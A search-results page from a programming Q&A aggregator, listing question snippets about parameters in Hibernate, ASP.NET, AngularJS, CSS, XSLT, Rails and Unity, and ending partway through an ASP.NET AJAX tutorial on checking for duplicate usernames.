Search Results

Search found 9087 results on 364 pages for 'strong parameters'.

Page 85/364 | < Previous Page | 81 82 83 84 85 86 87 88 89 90 91 92 | Next Page >

Reusing an anonymous parameter in a prepared statement

- by Chris Lieb

I am customizing the insert SQL generated by hibernate and have hit an issue. When Hibernate generates the query by itself, it inserts data into the first two columns of the table, but this causes a database error since all four columns of the table are non-nullable. For the insert to be performed properly, it must insert the same data into two columns of the new record. This means that I need Hibernate to bind the same data to two different parameters in the query (prepared statement) that I am writing. Is there some SQL syntax that allows me to refer to anonymous parameters bound to a prepared statement in an order different from which they are bound? Details REF_USER_PAGE_XREF ---------------------------------------- PK FK1 | NETWORK_ID | VARCHAR2(100) PK FK1 | PAGE_PATH | VARCHAR2(1000) | USER_LAST_UPDT | VARCHAR2(100) | TMSP_LAST_UPDT | DATE insert into REF_USER_ROLE_XREF( NETWORK_ID, PAGE_PATH, TMSP_LAST_UPDT, USER_LAST_UPDT) values ( ?, /* want to insert the same data here */ ?, ?, /* and here */ (select to_char(sysdate, 'DD-MON-YY') from dual) I want to insert the same data into the first and third anonymous parameters.

Read the article
Crystal Reports using ASP.Net

- by Dattu

I am new to the ASP.net and crystal reports.. I created a report using crystal reports and i used 3 parameters as Division,Month & Year. These parameters values will come from database using dropdown lists.. after selecting the parameters, report button clicked the report should come.. Report is coming but the values what ever I taken are not displaying in the report. Please give me solution for this and if code also provided it will be appreciated. Thanks in Advance. Dattu

Read the article
AS3 Components in Flash Designer

- by Jack Voight

In an ActionScript 2 project I can create a new MovieClip, right-click on it on the library and select "Component Definition" to add parameters that can be referenced inside the MovieClip. This parameters can be easily changed in the MovieClips's properties. Now, I'm working on an ActionScript 3 project but haven't been able to figure out a way to obtain the values passed in those parameters. I defined a parameter named "textToDisplay" but when I write the following in the Actions for the first frame I get an error: trace(textToDisplay); This is the error: 1120: Access of undefined property textToDisplay. Do you know how to capture the value of that parameter? Thanks PS: I'm using Adobe Flash CS3 Professional on Windows XP

Read the article
How can unit testing make parameter validation redundant?

- by Johann Gerell

We have a convention to validate all parameters of constructors and public functions/methods. For mandatory parameters of reference type, we mainly check for non-null and that's the chief validation in constructors, where we set up mandatory dependencies of the type. The number one reason why we do this is to catch that error early and not get a null reference exception a few hours down the line without knowing where or when the faulty parameter was introduced. As we start transitioning to more and more TDD, some team members feel the validation is redundant. Uncle Bob, who is a vocal advocate of TDD, strongly advices against doing parameter validation. His main argument seems to be "I have a suite of unit tests that makes sure everything works". But I can for the life of it just not see in what way unit tests can prevent our developers from calling these methods with bad parameters in production code. Please, unit testers out there, if you could explain this to me in a rational way with concrete examples, I'd be more than happy to seize this parameter validation!

Read the article
How SqlDataAdapter works internally?

- by tigrou

I wonder how SqlDataAdapter works internally, especially when using UpdateCommand for updating a huge DataTable (since it's usually a lot faster that just sending sql statements from a loop). Here is some idea I have in mind : It creates a prepared sql statement (using SqlCommand.Prepare()) with CommandText filled and sql parameters initialized with correct sql types. Then, it loops on datarows that need to be updated, and for each record, it updates parameters values, and call SqlCommand.ExecuteNonQuery(). It creates a bunch of SqlCommand objects with everything filled inside (CommandText and sql parameters). Several SqlCommands at once are then batched to the server (depending of UpdateBatchSize). It uses some special, low level or undocumented sql driver instructions that allow to perform an update on several rows in a effecient way (rows to update would need to be provided using a special data format and a the same sql query (UpdateCommand here) would be executed against each of these rows).

Read the article
Setting location based on previous parameter of $routeChangeError with AngularJS

- by Moo

I'm listening on events of the type $routeChangeError in a run block of my application. $rootScope.$on("$routeChangeError", function (event, current, previous, rejection) { if (!!previous) { console.log(previous); $location.path(previous.$$route.originalPath); } }); With the help of the previous parameter I would like to set the location to the previous page. This works as long as the "originalPath" of "previous.$$route" does not contain any parameters. If it contains parameters the "originalPath" is not transformed. Logging the previous objects returns the following output: $$route: Object ... originalPath: "/users/:id" regexp: /^\/users\/(?:([^\/]+)?)$/ ... params: Object id: "3" How can I set the location to the previous path including the parameters?

Read the article
can we assign object value to the label?

- by user334294

I have a label for that i have to assign object value which is returned by stored procedure.my code as following object returnvalue; SqlConnection con = new SqlConnection("Data Source=vela21; Initial Catalog=MilkDb;Integrated Security=True"); con.Open(); string sa; sa = textBox1.Text; SqlCommand cmd = new SqlCommand("custname", con); cmd.CommandType = CommandType.StoredProcedure; cmd.Parameters.Add("Cid", SqlDbType.Int).Value = sa; cmd.Parameters.Add("cname", SqlDbType.NVarChar, 20); cmd.Parameters["cname"].Direction = ParameterDirection.Output; returnvalue = cmd.ExecuteNonQuery(); label3.Text = Convert.ToString(returnvalue); con.Close(); can anyone help me? plz........

Read the article
Design report of 4-D data set

- by phq

I'm writing a report generator that will present data each being generated from 4 parameters. Time interval Group Measurement value(one of several to choose from) Device All these are orthogonal giving me a 4-D dataset to present. There are some simplifications where one parameter is the same for all and other parameters are merged. Still it appears as there are situations where all values are wanted on the report. In short the report should both be simple to overview and contain details. There will also be an interface where the user setup the range and granularity for each parameter. The most naive solution would be to have a 2D table where each cell contain another table with values of the remaining two dimensions. This is technically feasible but I'm worried that it would become hard to overview. Another approach is to present first two dimensions in a 2D table and the remaining parameters in groups Are there any good method to address this kind of issue?

Read the article
Android camera being landscaped in some devices

- by nala4ever

Im new to Android and I tried a tutorial for camera API. The tutorial works fine. When I use HTC desire I can see the camera view in both portrait and landscape, but when I use Samsung Galaxy I get a the camera view only in a landscaped view. I tried the following code to rotate the camera view as well.. Camera.Parameters parameters = camera.getParameters(); parameters.setRotation(90); then the camera doesn't work as expected. (screen splits into 4 and not clear). Does anyone have an idea for this issue ? Thanks.

Read the article
Do I need the text "_size" in the my.cnf file for mysql 5.1?

- by chongman

This is a pretty simple question about setting parameters in the my.cnf file for mysql 5.1. This page gives me the parameters I can tune: http://dev.mysql.com/doc/refman/5.0/en/server-parameters.html and so I think I would need to write key_buffer_size = 256M But when I open my current my.cnf, it has the line: key_buffer = 16M My question is, do I need "key_buffer_size" or "key_buffer" or does it not matter which I use? And, how would I know if something in the my.cnf is incorrect? Where's the daemon start log file? I am running ubuntu; I think version 8.04 LTS

Read the article
How can I see a variable defined in another php-file?

- by Roman

I use the same constant in all my php files. I do not want to assign the value of this variable in all my files. So, I wanted to create one "parameters.php" file and to the assignment there. Then in all other files I include the "parameters.php" and use variables defined in the "parameters.php". It was the idea but it does not work. I also tried to make the variable global. It also does not work. Is there a way to do what I want? Or may be there some alternative approach?

Read the article
programming help

- by user208639

class Person holds personal data Its constructor receives 3 parameters, two Strings representing first and last names and an int representing age public Person(String firstName, String lastName, int age) { its method getName has no parameters and returns a String with format "Lastname, Firstname" its method getAge takes no parameters and returns an int representing the current age its method birthday increases age value by 1 and returns the new age value Create the class Person and paste the whole class into the textbox below public class Person { public Person(String first, String last, int age) { getName = "Lastname, Firstname"; System.out.print(last + first); getAge = age + 1; return getAge; System.out.print(getAge); birthday = age + 1; newAge = birthday; return newAge; } } im getting errors such as "cannot find symbol - variable getName" but when i declare a variable it still not working, i also wanted to ask if i am heading in the right direction or is it all totally wrong? im using a program called BlueJ to work on.

Read the article
Why won't "!important" override ":first-line"?

- by bazzlevi

I am trying to do the tutorial in Chapter 6 of the 2nd edition of "CSS: The Missing Manual", and I've run into an issue I'm trying to understand. I have one style that looks like this: #main p:first-line { color: #999999; font-weight: bold; } Later I have another style that looks like this: #main p.byline { color: #00994D !important; font-size: 1.6em; margin: 5px 0 25px 50px; } I am confused because the second one won't override the color choice in the first one despite the fact that the second one has "!important" in it. I put both classes into an online specificity calculator, and the second one comes out being more specific, so I'm doubly confused. By the way, the inclusion of "!important" is the work-around suggested in the errata for the book. Odd that it still doesn't work! Here's the code for the entire page: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>CSS Typography</title> <style type="text/css"> html, body, h1, h2, h3, h4, h5, h6, p, ol, ul, li, pre, code, address, variable, form, fieldset, blockquote { padding: 0; margin: 0; font-size: 100%; font-weight: normal; } table { border-collapse: collapse; border-spacing: 0; } td, th, caption { font-weight: normal; text-align: left; } img, fieldset { border: 0; } ol { padding-left: 1.4em; list-style: decimal; } ul { padding-left: 1.4em; list-style:square; } q:before, q:after { content:''; } body { color: #002D4B; font-family: Arial, Helvetica, sans-serif; font-size: 62.5% } #main h1 { color: #F60; font-family: "Arial Black", Arial, Helvetica, sans-serif; font-size: 4em; } #main h2 { font: bold 3.5em "Hoefler Text", Garamond, Times, serif; border-bottom: 1px solid #002D4B; margin-top: 25px; } #main h3 { color: #F60; font-size: 1.9em; font-weight: bold; text-transform: uppercase; margin-top: 25px; margin-bottom: 10px; } #main p { font-size: 1.5em; line-height: 150%; margin-left: 150px; margin-right: 50px; margin-bottom: 10px; } #main p:first-line { color: #999999; font-weight: bold; } #main ul { margin: 50px 0 25px 50px; width: 150px; float: right; } #main li { color: #207EBF; font-size: 1.5em; margin-bottom: 7px; } #main p.byline { color: #00994D !important; font-size: 1.6em; margin: 5px 0 25px 50px; } #main .byline strong { color: #207EBF; text-transform: uppercase; margin-left: 5px; } </style> </head> <body> <div id="main"> <h1><strong>CSS</strong> The Missing Manual</h1> <h2>Exploring Typographic Possibilities</h2> <p class="byline">november 30 <strong>Rod Dibble</strong></p> <ul> <li>Lorem Ipsum</li> <li>Reprehenderit qui in ea</li> <li>Lorem Ipsum</li> <li>Reprehenderit qui in ea</li> <li>Lorem Ipsum</li> <li>Reprehenderit qui in ea</li> </ul> <h3>Esse quam nulla</h3> <p>Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur? Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p> <h3>Quis autem vel eum</h3> <p>Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur? Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p> </div> </body> </html> Here is the above code on JSBin: http://jsbin.com/unexe3

Read the article
XML transform element appearing in wrong place in document

- by Mike

I am having some problems with an XML transform and need some help. The stylesheet should iterate through all suffix elements and place the contents without the suffix tag next to the last text node within its first ancestor quote-block element (see desired ouput). It works when only a single suffix is present, but not when 2 are present, when 2 are present it places both suffixes next to each other in the last text node of the first quote-block. Any ideas? I have tried limiting the selections to ancestor::quote-block[1] in various places but that doesn't have the desired effect. Source XML <paragraph> <para> <quote-block> <list prefix-rules="specified"> <item prefix="“B42"> <para id="0a84d149-91b7-4012-ac6d-9f4eb8ed6c37">In June 2000, EME and EWS reached an agreement to negotiate towards a direct contract for coal haulage by rail (on a DIY basis), which would replace the previous indirect E2E arrangements that EME had in place with ECSL. An internal EWS e-mail noted: <quote-block> <quote-para>‘We did the deal with Edison Mission yesterday morning for LBT-Fiddlers @ £[…]/tonne as agreed. This rate until 16th September pending a contract.</quote-para> <quote-para><emphasis strength="strong">Enron are now off our hands so far as Edison are concerned. The Enron flows we have left are to British Energy’s station at Eggborough; from Immingham, Redcar and Hull</emphasis>. Also to Enron’s own power station at Wilton – 250,000 tonnes/year. I think we are stuck Enron [sic] on the Eggborough traffic until next April when British Energy will, hopefully take over their own coal procurement. <emphasis strength="strong">But we have got them out of Fiddlers Ferry and Ferrybridge – a big step forward</emphasis>.’</quote-para> <suffix>(Emphasis added.)</suffix> </quote-block> </para> </item> <item prefix="B43"> <para id="d64a5a72-0a02-476f-9a7b-7c07bbc93a8a">This e-mail is evidence of both EWS’s intent and, indeed, its success in stopping ECSL from carrying out indirect supplies to EME, one of the new generating companies.”</para> </item> </list> <suffix>(emphasis in original)</suffix> </quote-block> </para> </paragraph> Stylesheet <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns="http://xml.sm.com/schema/cases/report" xmlns:sm="http://xml.sm.com/functions" xmlns:saxon="http://saxon.sf.net/" xpath-default-namespace="http://sm.com/schema/cases/report" exclude-result-prefixes="xs sm" version="2.0"> <xsl:output method="xml" indent="no"/> <xsl:template match="/"> <xsl:apply-templates/> </xsl:template> <xsl:template match="*"> <xsl:copy> <xsl:copy-of select="@*"/> <xsl:apply-templates/> </xsl:copy> </xsl:template>  <xsl:template match="*[*:quote-block and descendant::*:suffix]"> <xsl:call-template name="process-quote-block"/> </xsl:template>  <xsl:template match="*[*:quote and descendant::*:suffix]"> <xsl:call-template name="process-quote-block"/> </xsl:template>  <xsl:template name="process-quote-block"> <xsl:variable name="quoteBlockCopy"> <xsl:copy-of select="."/> </xsl:variable> <xsl:apply-templates select="$quoteBlockCopy" mode="append-suffix"> <xsl:with-param name="suffix" select="sm:get-suffix-note(.)"/> <xsl:with-param name="end-node" select="sm:get-last-text-node($quoteBlockCopy)"/> </xsl:apply-templates> </xsl:template>  <xsl:template match="*[*:quote-block and descendant::*:suffix][ancestor::*:quote-block[1]]" mode="create-copy"> <xsl:call-template name="process-quote-block"/> </xsl:template>  <xsl:template match="*[*:quote and descendant::*:suffix]" mode="create-copy"> <xsl:call-template name="process-quote-block"/> </xsl:template>  <xsl:template match="*" mode="append-suffix"> <xsl:param name="suffix"/> <xsl:param name="end-node"/> <xsl:copy> <xsl:copy-of select="@*"/> <xsl:apply-templates mode="append-suffix"> <xsl:with-param name="suffix" select="$suffix"/> <xsl:with-param name="end-node" select="$end-node"/> </xsl:apply-templates> </xsl:copy> </xsl:template>  <xsl:template match="text()[normalize-space() != '']" mode="append-suffix"> <xsl:param name="suffix"/> <xsl:param name="end-node"/> <xsl:choose> <xsl:when test="count(. | $end-node) = 1"> <xsl:value-of select="."/> <xsl:apply-templates select="$suffix"/> </xsl:when> <xsl:otherwise>  <xsl:value-of select="."/> </xsl:otherwise> </xsl:choose> </xsl:template>  <xsl:template match="*:suffix" mode="append-suffix"/> <xsl:function name="sm:get-suffix-note"> <xsl:param name="node"/> <xsl:sequence select="$node/descendant::*:suffix/node()"/> </xsl:function> <xsl:function name="sm:get-last-text-node">  <xsl:param name="node"/> <xsl:sequence select="reverse($node//text()[not(ancestor::*:suffix) and normalize-space() != ''])[1]"/> </xsl:function> </xsl:stylesheet> Current Output XML <paragraph> <para> <quote-block> <list prefix-rules="specified"> <item prefix="“B42"> <para id="0a84d149-91b7-4012-ac6d-9f4eb8ed6c37">In June 2000, EME and EWS reached an agreement to negotiate towards a direct contract for coal haulage by rail (on a DIY basis), which would replace the previous indirect E2E arrangements that EME had in place with ECSL. An internal EWS e-mail noted: <quote-block> <quote-para>‘We did the deal with Edison Mission yesterday morning for LBT-Fiddlers @ £[…]/tonne as agreed. This rate until 16th September pending a contract.</quote-para> <quote-para><emphasis strength="strong">Enron are now off our hands so far as Edison are concerned. The Enron flows we have left are to British Energy’s station at Eggborough; from Immingham, Redcar and Hull</emphasis>. Also to Enron’s own power station at Wilton – 250,000 tonnes/year. I think we are stuck Enron [sic] on the Eggborough traffic until next April when British Energy will, hopefully take over their own coal procurement. <emphasis strength="strong">But we have got them out of Fiddlers Ferry and Ferrybridge – a big step forward</emphasis>.’</quote-para> </quote-block> </para> </item> <item prefix="B43"> <para id="d64a5a72-0a02-476f-9a7b-7c07bbc93a8a">This e-mail is evidence of both EWS’s intent and, indeed, its success in stopping ECSL from carrying out indirect supplies to EME, one of the new generating companies.”(Emphasis added.)(emphasis in original)</para> </item> </list> </quote-block> </para> </paragraph> Desired Ouput <paragraph> <para> <quote-block> <list prefix-rules="specified"> <item prefix="“B42"> <para id="0a84d149-91b7-4012-ac6d-9f4eb8ed6c37">In June 2000, EME and EWS reached an agreement to negotiate towards a direct contract for coal haulage by rail (on a DIY basis), which would replace the previous indirect E2E arrangements that EME had in place with ECSL. An internal EWS e-mail noted: <quote-block> <quote-para>‘We did the deal with Edison Mission yesterday morning for LBT-Fiddlers @ £[…]/tonne as agreed. This rate until 16th September pending a contract.</quote-para> <quote-para><emphasis strength="strong">Enron are now off our hands so far as Edison are concerned. The Enron flows we have left are to British Energy’s station at Eggborough; from Immingham, Redcar and Hull</emphasis>. Also to Enron’s own power station at Wilton – 250,000 tonnes/year. I think we are stuck Enron [sic] on the Eggborough traffic until next April when British Energy will, hopefully take over their own coal procurement. <emphasis strength="strong">But we have got them out of Fiddlers Ferry and Ferrybridge – a big step forward</emphasis>.’(Emphasis added.)</quote-para> </quote-block> </para> </item> <item prefix="B43"> <para id="d64a5a72-0a02-476f-9a7b-7c07bbc93a8a">This e-mail is evidence of both EWS’s intent and, indeed, its success in stopping ECSL from carrying out indirect supplies to EME, one of the new generating companies.”(emphasis in original)</para> </item> </list> </quote-block> </para> </paragraph>

Read the article
Rails link to PDF version of show.html.erb

- by Danny McClelland

Hi Everyone, I have created a pdf version of our rails application using the Prawn plugin, the page in question is part of the Kase model - the link to the kase is /kases/1 and the link to the pdf version is /kases/1.pdf. How can I add a link within the show.html.erb to the PDF file so whichever page is being viewed it updates the URL to the correct case id? <% content_for :header do -%> <%=h @kase.jobno %> | <%=h @kase.casesubject %> <% end -%>  <% content_for :sidebar do -%> <% if @kase.avatar.exists? then %> <%= image_tag @kase.avatar.url %> <% else %> <p style="font-size:smaller"> You can upload an icon for this case that will display here. Usually this would be for the year number icon for easy recognition.</p> <% end %> <% end %>  <ul id="kases_showlist"> <li>Date Instructed: <span><%=h @kase.dateinstructed %></span></li> <li>Client Company: <span><%=h @kase.clientcompanyname %></span></li> <li>Client Reference: <span><%=h @kase.clientref %></span></li> <li>Case Subject: <span><%=h @kase.casesubject %></span></li> <li>Transport<span><%=h @kase.transport %></span></li> <li>Goods<span><%=h @kase.goods %></span></li> <li>Case Status: <span><%=h @kase.kase_status %></span></li> <li>Client Company Address: <span class="address"><%=h @kase.clientcompanyaddress %></span></li> <li>Client Company Fax: <span><%=h @kase.clientcompanyfax %></span></li> <li>Case Handler: <span><%=h @kase.casehandlername %></span></li> <li>Case Handler Tel: <span><%=h @kase.casehandlertel %></span></li> <li>Case Handler Email: <span><%=h @kase.casehandleremail %></span></li> <li>Claimant Name: <span><%=h @kase.claimantname %></span></li> <li>Claimant Address: <span class="address"><%=h @kase.claimantaddress %></span></li> <li>Claimant Contact: <span><%=h @kase.claimantcontact %></span></li> <li>Claimant Tel: <span><%=h @kase.claimanttel %></span></li> <li>Claiment Mob: <span><%=h @kase.claimantmob %></span></li> <li>Claiment Email: <span><%=h @kase.claimantemail %></span></li> <li>Claimant URL: <span><%=h @kase.claimanturl %></span></li> <li>Comments: <span><%=h @kase.comments %></span></li> </ul>  <div id="kase_finances"> <div class="js_option"> <h2>Financial Options</h2><p class="finance_showhide"><%= link_to_function "Show","Element.show('finance_showhide');" %> / <%= link_to_function "Hide","Element.hide('finance_showhide');" %></p> </div> <div id="finance_showhide" style="display:none"> <ul id="kases_new_finance"> <li>Invoice Number<span><%=h @kase.invoicenumber %></span></li> <li>Net Amount<span><%=h @kase.netamount %></span></li> <li>VAT<span><%=h @kase.vat %></span></li> <li>Gross Amount<span><%=h @kase.grossamount %></span></li> <li>Date Closed<span><%=h @kase.dateclosed %></span></li> <li>Date Paid<span><%=h @kase.datepaid %></span></li> </ul></div> </div>  <%= link_to 'Edit Case', edit_kase_path(@kase) %> | <%= link_to 'Back', kases_path %> | <a href="#">Top</a> <div style="width:120%; height: 50px; background-color: black; margin: 10px 0 0 -19px; padding: 0; background-color: #d4d4d4;"> </div> <div class="js_option_kaseemails"> <%= link_to_function "Show", "Element.show('newinstructionemail1');" %> / <%= link_to_function "Hide", "Element.hide('newinstructionemail1');" %> </div> <h3>New Instruction Email</h3> <div id="newinstructionemail1" style="display:none"> <p class="kase_email_output"> Hi,<br /> <br /> Many thanks for your instructions in the subject matter.<br /> <br /> We have allocated reference number <%=h @kase.jobno %> to the above claim.<br /> <br /> We have started our inquiries and will be in touch.<br /> <br /> Best Regards,<br /> <br /> <strong><%=h current_user.name %></strong> <br /> McClelland & Co<br /> PO Box 149<br /> Southport<br /> PR8 4GZ<br /> <br /> Tel: +(0) 1704 569871<br /> Fax: +(0) 1704 562234<br /> Mob: <%=h current_user.mobile %><br /> E-mail: <%= current_user.email %><br /> <br /> This e-mail and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you receive this e-mail in error please notify the originator of the message. <br /><br /> McClelland & Co has taken every reasonable precaution to ensure that any attachment to this e-mail has been checked for viruses but it is strongly recommended that you carry out your own virus check before opening any attachment. McClelland & Co cannot accept liability for any damage sustained as a result of software virus infection. </p> <%= link_to 'Edit Case', edit_kase_path(@kase) %> | <%= link_to 'Back', kases_path %> | <a href="#">Top</a> </div> <div style="width:120%; height: 20px; background-color: black; margin: 10px 0 0 -19px; padding: 0; background-color: #d4d4d4;"> </div> <div class="js_option_kaseemails"> <%= link_to_function "Show", "Element.show('newinstructionemail');" %> / <%= link_to_function "Hide", "Element.hide('newinstructionemail');" %> </div> <h3>New Instruction Email</h3> <div id="newinstructionemail" style="display:none"> <p class="kase_email_output"> Hi,<br /> <br /> Many thanks for your instructions in the subject matter.<br /> <br /> We have allocated reference number <%=h @kase.jobno %> to the above claim.<br /> <br /> We have started our inquiries and will be in touch.<br /> <br /> Best Regards,<br /> <br /> <strong><%=h current_user.name %></strong> <br /> McClelland & Co<br /> PO Box 149<br /> Southport<br /> PR8 4GZ<br /> <br /> Tel: +(0) 1704 569871<br /> Fax: +(0) 1704 562234<br /> Mob: <%=h current_user.mobile %><br /> E-mail: <%= current_user.email %><br /> <br /> This e-mail and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you receive this e-mail in error please notify the originator of the message. <br /><br /> McClelland & Co has taken every reasonable precaution to ensure that any attachment to this e-mail has been checked for viruses but it is strongly recommended that you carry out your own virus check before opening any attachment. McClelland & Co cannot accept liability for any damage sustained as a result of software virus infection. </p> <%= link_to 'Edit Case', edit_kase_path(@kase) %> | <%= link_to 'Back', kases_path %> | <a href="#">Top</a> </div> <div style="width:120%; height: 20px; background-color: black; margin: 10px 0 0 -19px; padding: 0; background-color: #d4d4d4;"> </div> <div class="js_option_kaseemails"> <%= link_to_function "Show", "Element.show('newinstructionemail2');" %> / <%= link_to_function "Hide", "Element.hide('newinstructionemail2');" %> </div> <h3>New Instruction Email</h3> <div id="newinstructionemail2" style="display:none;"> <p class="kase_email_output"> Hi,<br /> <br /> Many thanks for your instructions in the subject matter.<br /> <br /> We have allocated reference number <%=h @kase.jobno %> to the above claim.<br /> <br /> We have started our inquiries and will be in touch.<br /> <br /> Best Regards,<br /> <br /> <strong><%=h current_user.name %></strong> <br /> McClelland & Co<br /> PO Box 149<br /> Southport<br /> PR8 4GZ<br /> <br /> Tel: +(0) 1704 569871<br /> Fax: +(0) 1704 562234<br /> Mob: <%=h current_user.mobile %><br /> E-mail: <%= current_user.email %><br /> <br /> This e-mail and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you receive this e-mail in error please notify the originator of the message. <br /><br /> McClelland & Co has taken every reasonable precaution to ensure that any attachment to this e-mail has been checked for viruses but it is strongly recommended that you carry out your own virus check before opening any attachment. McClelland & Co cannot accept liability for any damage sustained as a result of software virus infection. </p> <%= link_to 'Edit Case', edit_kase_path(@kase) %> | <%= link_to 'Back', kases_path %> | <a href="#">Top</a> </div> Thanks, Danny

Read the article
Unity3D draw call optimization : static batching VS manually draw mesh with MaterialPropertyBlock

- by Heisenbug

I've read Unity3D draw call batching documentation. I understood it, and I want to use it (or something similar) in order to optimize my application. My situation is the following: I'm drawing hundreds of 3d buildings. Each building can be represented using a Mesh (or a SubMesh for each building, but I don't thing this will affect performances) Each building can be textured with several combinations of texture patterns(walls, windows,..). Textures are stored into an Atlas for optimizaztion (see Texture2d.PackTextures) Texture mapping and facade pattern generation is done in fragment shader. The shader can be the same (except for few values) for all buildings, so I'd like to use a sharedMaterial in order to optimize parameters passed to the GPU. The main problem is that, even if I use an Atlas, share the material, and declare the objects as static to use static batching, there are few parameters(very fews, it could be just even a float I guess) that should be different for every draw call. I don't know exactly how to manage this situation using Unity3D. I'm trying 2 different solutions, none of them completely implemented. Solution 1 Build a GameObject for each building building (I don't like very much the overhead of a GameObject, anyway..) Prepare each GameObject to be static batched with StaticBatchingUtility.Combine. Pack all texture into an atlas Assign the parent game object of combined batched objects the Material (basically the shader and the atlas) Change some properties in the material before drawing an Object The problem is the point 5. Let's say I have to assign a different id to an object before drawing it, how can I do this? If I use a different material for each object I can't benefit of static batching. If I use a sharedMaterial and I modify a material property, all GameObjects will reference the same modified variable Solution 2 Build a Mesh for every building (sounds better, no GameObject overhead) Pack all textures into an Atlas Draw each mesh manually using Graphics.DrawMesh Customize each DrawMesh call using a MaterialPropertyBlock This would solve the issue related to slightly modify material properties for each draw call, but the documentation isn't clear on the following point: Does several consecutive calls to Graphic.DrawMesh with a different MaterialPropertyBlock would cause a new material to be instanced? Or Unity can understand that I'm modifying just few parameters while using the same material and is able to optimize that (in such a way that the big atlas is passed just once to the GPU)?

Read the article
Preventing duplicate Data with ASP.NET AJAX

- by Yousef_Jadallah

Some times you need to prevent User names ,E-mail ID's or other values from being duplicated by a new user during Registration or any other cases,So I will add a simple approach to make the page more user-friendly. Instead the user filled all the Registration fields then press submit after that received a message as a result of PostBack that "THIS USERNAME IS EXIST", Ajax tidies this up by allowing asynchronous querying while the user is still completing the registration form. ASP.NET enables you to create Web services can be accessed from client script in Web pages by using AJAX technology to make Web service calls. Data is exchanged asynchronously between client and server, typically in JSON format. I’ve added an article to show you step by step how to use ASP.NET AJAX with Web Services , you can find it here . Lets go a head with the steps : 1-Create a new project , if you are using VS 2005 you have to create ASP.NET Ajax Enabled Web site. 2-Create your own Database which contain user table that have User_Name field. for Testing I’ve added SQL Server Database that come with Dot Net 2008: Then I’ve created tblUsers: This table and this structure just for our example, you can use your own table to implement this approach. 3-Add new Item to your project or website, Choose Web Service file, lets say WebService.cs .In this Web Service file import System.Data.SqlClient Namespace, Then Add your web method that contain string parameter which received the Username parameter from the Script , Finally don’t forget to qualified the Web Service Class with the ScriptServiceAttribute attribute ([System.Web.Script.Services.ScriptService]) using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Services; using System.Data.SqlClient; [WebService(Namespace = "http://tempuri.org/")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] [System.Web.Script.Services.ScriptService] public class WebService : System.Web.Services.WebService { [WebMethod] public int CheckDuplicate(string User_Name) { string strConn = @"Data Source=.\SQLEXPRESS;AttachDbFilename=|DataDirectory|\TestDB.mdf;Integrated Security=True;User Instance=True"; string strQuery = "SELECT COUNT(*) FROM tblUsers WHERE User_Name = @User_Name"; SqlConnection con = new SqlConnection(strConn); SqlCommand cmd = new SqlCommand(strQuery, con); cmd.Parameters.Add("User_Name", User_Name); con.Open(); int RetVal= (int)cmd.ExecuteScalar(); con.Close(); return RetVal; } } .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } Our Web Method here is CheckDuplicate Which accept User_Name String as a parameter and return number of the rows , if the name will found in the database this method will return 1 else it will return 0. I’ve applied [WebMethod] Attribute to our method CheckDuplicate, And applied the ScriptService attribute to a Web Service class named WebService. 4-Add this simple Registration form : <fieldset> <table id="TblRegistratoin" cellpadding="0" cellspacing="0"> <tr> <td> User Name </td> <td> <asp:TextBox ID="txtUserName" onblur="CallWebMethod();" runat="server"></asp:TextBox> </td> <td> <asp:Label ID="lblDuplicate" runat="server" ForeColor="Red" Text=""></asp:Label> </td> </tr> <tr> <td colspan="3"> <asp:Button ID="btnRegistration" runat="server" Text="Registration" /> </td> </tr> </table> </fieldset> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } onblur event is added to the Textbox txtUserName, This event Fires when the Textbox loses the input focus, That mean after the user get focus out from the Textbox CallWebMethod function will be fired. CallWebMethod will be implemented in step 6. 5-Add ScriptManager Control to your aspx file then reference the Web service by adding an asp:ServiceReference child element to the ScriptManager control and setting its path attribute to point to the Web service, That generate a JavaScript proxy class for calling the specified Web service from client script. 